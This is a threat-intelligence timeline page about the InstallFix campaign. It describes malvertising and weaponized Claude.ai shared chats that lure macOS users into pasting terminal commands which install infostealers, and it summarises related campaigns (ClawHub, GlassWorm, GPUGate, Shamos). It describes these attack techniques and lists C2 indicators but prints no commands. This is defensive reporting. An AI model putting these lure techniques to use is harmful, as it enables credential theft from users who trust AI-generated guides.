CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

InstallFix Campaign Expands to macOS via Google Ads and Abused Claude.ai Chats

First reported
Last updated
1 unique sources, 2 articles

Summary

Hide ▲

Threat actors are expanding the InstallFix social engineering technique to abuse Google Ads and legitimate Claude.ai shared chats to distribute macOS malware. The attackers create weaponized installation guides embedded in publicly accessible Claude chats, tricking users into executing malicious commands that download and execute infostealers such as MacSync and in-memory loader scripts. The campaigns target macOS users searching for 'Claude mac download' via malvertising on Google Ads, using Anthropic's real claude.ai domain in sponsored search results. The malware variants harvest browser credentials, cookies, and macOS Keychain contents while evading detection through in-memory execution and selective victim profiling.

Timeline

  1. 06.03.2026 17:00 2 articles · 2mo ago

    InstallFix Attacks Distribute Amatera Infostealer via Fake Claude Code Install Guides

    Threat actors expand the InstallFix campaign to macOS by abusing Google Ads and embedding malicious installation instructions in legitimate Claude.ai shared chats. The weaponized chats, masquerading as official guides (e.g., attributed to 'Apple Support'), instruct users to paste terminal commands that download and execute macOS malware variants. Two separate payloads are identified: one using the MacSync infostealer to harvest browser credentials, cookies, and macOS Keychain contents, and another using an in-memory loader script executed via osascript to evade detection. The malvertising campaign targets users searching for 'Claude mac download' and leverages Anthropic's real claude.ai domain in sponsored search results, making the attack more deceptive. The malware includes selective targeting checks to exclude victims based on Russian or CIS-region keyboard input sources.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

341 Malicious ClawHub Skills Target OpenClaw Users with Atomic Stealer

A security audit by Koi Security identified 341 malicious skills on ClawHub, a marketplace for OpenClaw users, which distribute Atomic Stealer malware to steal sensitive data from macOS and Windows systems. The campaign, codenamed ClawHavoc, uses social engineering tactics to trick users into installing malicious prerequisites. The skills masquerade as legitimate tools, including cryptocurrency utilities, YouTube tools, and finance applications. OpenClaw has added a reporting feature and partnered with VirusTotal to scan skills uploaded to ClawHub, providing an additional layer of security for the OpenClaw community. The malware targets API keys, credentials, and other sensitive data, exploiting the open-source ecosystem's vulnerabilities. The campaign coincides with a report from OpenSourceMalware, highlighting the same threat. The intersection of AI agent capabilities and persistent memory amplifies the risks, enabling stateful, delayed-execution attacks. New findings reveal almost 400 fake crypto trading add-ons in the project behind the viral Moltbot/OpenClaw AI assistant tool can lead users to install information-stealing malware. These addons, called skills, masquerade as cryptocurrency trading automation tools and target ByBit, Polymarket, Axiom, Reddit, and LinkedIn. The malicious skills share the same command-and-control (C2) infrastructure, 91.92.242.30, and use sophisticated social engineering to convince users to execute malicious commands which then steals crypto assets like exchange API keys, wallet private keys, SSH credentials, and browser passwords. Additionally, fake OpenClaw installers hosted on GitHub and promoted by Bing AI instructed users to run commands that deployed information stealers and proxy malware. Threat actors set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results. The malicious repositories contained shell scripts paired with Mach-O executables identified as Atomic Stealer malware for macOS users. For Windows users, the threat actor delivered OpenClaw_x64.exe, which deployed multiple malicious executables, including Rust-based malware loaders and Vidar stealer. Another Windows executable delivered was the GhostSocks backconnect proxy malware, designed to convert users' machines into proxy nodes.

Open in new tab

GlassWorm malware targets OpenVSX, VS Code registries

GlassWorm has escalated into a multi-stage framework combining remote access trojans (RATs), data theft, and hardware wallet phishing, now leveraging Solana dead drops for C2, a novel browser extension for surveillance, and the Model Context Protocol (MCP) ecosystem. The campaign delivers a .NET binary targeting Ledger and Trezor devices by masquerading as configuration errors and prompting users to input recovery phrases, while a Websocket-based JavaScript RAT exfiltrates browser data and deploys HVNC or SOCKS proxy modules. The malware uses a Google Chrome extension disguised as Google Docs Offline for session surveillance on cryptocurrency platforms like Bybit and harvests extensive browser data. Recent innovations include a Zig-compiled dropper embedded within an Open VSX extension named 'specstudio.code-wakatime-activity-tracker' masquerading as WakaTime, which installs platform-specific Node.js native addons compiled from Zig code to stealthily infect all IDEs on a developer's machine. This dropper downloads a malicious VS Code extension (.VSIX) named 'floktokbok.autoimport' from an attacker-controlled GitHub account, which impersonates a legitimate extension with over 5 million installs and installs silently across all detected IDEs, avoiding execution on Russian systems and communicating with the Solana blockchain for C2. A new large-scale social engineering campaign has emerged, distributing fake VS Code security alerts posted in GitHub Discussions to automate posts across thousands of repositories using low-activity accounts, triggering GitHub email notifications with fake vulnerability advisories containing realistic CVE references. Links redirect victims through a cookie-driven chain to drnatashachinn[.]com, where a JavaScript reconnaissance payload profiles targets before delivering additional malicious payloads. This operation represents a coordinated, large-scale effort targeting developers. GlassWorm remains a persistent supply chain threat impacting npm, PyPI, GitHub, and Open VSX ecosystems. Since its emergence in October 2025, the campaign has evolved from invisible Unicode steganography in VS Code extensions to a sophisticated multi-vector operation spanning 151 compromised GitHub repositories and dozens of malicious npm packages. The threat actor, assessed to be Russian-speaking, continues to avoid infecting Russian-locale systems and leverages Solana blockchain transactions as dead drops for C2 resolution. Recent developments include the ForceMemo offshoot that force-pushes malicious code into Python repositories, the abuse of extensionPack and extensionDependencies for transitive malware delivery, and the introduction of Rust-based implants targeting developer toolchains. Eclipse Foundation and Open VSX have implemented security measures such as token revocation and automated scanning, but the threat actors have repeatedly adapted by rotating infrastructure, obfuscating payloads, and expanding into new ecosystems like MCP servers. A new wave of the GlassWorm campaign targets the OpenVSX ecosystem with 73 "sleeper" extensions that activate after updates, delivering malware to developers. Six extensions have already been activated, while the remainder remain dormant or suspicious. The campaign leverages thin loaders that fetch secondary VSIX packages or platform-specific modules at runtime, marking a shift in the group's tactics to evade detection by avoiding direct malware embedding in initial uploads. The extensions mimic legitimate listings using identical icons and near-identical names to deceive developers. Developers who installed these extensions are advised to rotate all secrets and perform a full system clean-up.

Open in new tab

GPUGate Malware Campaign Targets IT Firms in Western Europe

The **GPUGate malware campaign** continues to evolve, now leveraging **Claude AI artifacts and Google Ads** to distribute **MacSync and AMOS infostealers** via **ClickFix attacks**. Over **15,600 users** have accessed malicious Claude-generated guides, which instruct victims to execute Terminal commands fetching malware payloads. This follows earlier waves abusing **ChatGPT/Grok chats, fake GitHub repositories, and malvertising** to deploy stealers targeting credentials, crypto wallets, and system data. The campaign, active since **April 2023**, has expanded from traditional phishing to **abusing AI ecosystems, supply-chain weaknesses, and trusted platforms** (e.g., Homebrew, LogMeIn, AI assistants). Russian-speaking actors operate **AMOS as a Malware-as-a-Service (MaaS)**, with stolen logs sold in underground markets to fuel fraud, ransomware, and account takeovers. The latest **Claude artifact abuse** underscores the shift toward **high-impact, scalable distribution channels**, exploiting weak platform vetting and user trust in AI-generated content. Organizations should monitor for **suspicious Terminal activity, C2 traffic to domains like `a2abotnet[.]com`, and unauthorized data egress** while educating users on **ClickFix-style lures** and unverified AI tool instructions.

Open in new tab

Shamos Infostealer Targeting Mac Devices via ClickFix Attacks

Since June 2025, the COOKIE SPIDER group’s Shamos infostealer and Atomic macOS Stealer (AMOS) variants have targeted Mac devices via evolving ClickFix social engineering campaigns, stealing data and credentials from browsers, Keychain, Apple Notes, and cryptocurrency wallets. Early campaigns relied on malvertising, fake GitHub repositories, and signed Swift applications hosted on legitimate platforms like Cloudflare Pages and Squarespace. AMOS has been delivered through disk images, obfuscated shell scripts, and in-memory payloads, expanding from Terminal-based ClickFix tactics to abuse trusted macOS applications. In March 2026, Apple introduced a Terminal security feature in macOS Tahoe 26.4 that blocks pasted command execution and warns users of risks, disrupting ClickFix attack chains. A new campaign observed in April 2026 by Jamf researchers now abuses the built-in Script Editor application to bypass these protections. The campaign uses fake Apple-themed disk cleanup guides to trick users into launching Script Editor via the applescript:// URL scheme, executing an obfuscated payload in system memory that delivers Atomic Stealer. The new Script Editor-based ClickFix variation enables theft of Keychain data, browser autofill information, cryptocurrency wallet extensions, and system details without requiring Terminal interaction. AMOS continues to expand its capabilities, now including a backdoor component for persistent access to compromised systems.

Open in new tab